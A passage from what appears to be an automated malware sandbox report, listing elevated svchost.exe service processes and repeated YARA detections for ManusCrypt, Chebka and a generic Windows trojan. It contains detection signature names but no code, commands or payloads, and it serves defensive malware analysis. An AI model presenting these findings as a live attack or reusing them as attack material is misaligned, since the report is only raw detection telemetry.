                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000003.424592109.00000244FE303000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

                                                          Target ID:11
                                                          Start time:10:16:32
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ffc30280000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:17
                                                          Start time:10:16:41
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:18
                                                          Start time:10:16:43
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:19
                                                          Start time:10:16:45
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:20
                                                          Start time:10:16:49
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:22
                                                          Start time:10:16:51
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:23
                                                          Start time:10:16:55
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:25
                                                          Start time:10:16:59
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:27
                                                          Start time:10:17:02
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:28
                                                          Start time:10:17:07
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:29
                                                          Start time:10:17:09
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:30
                                                          Start time:10:17:12
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
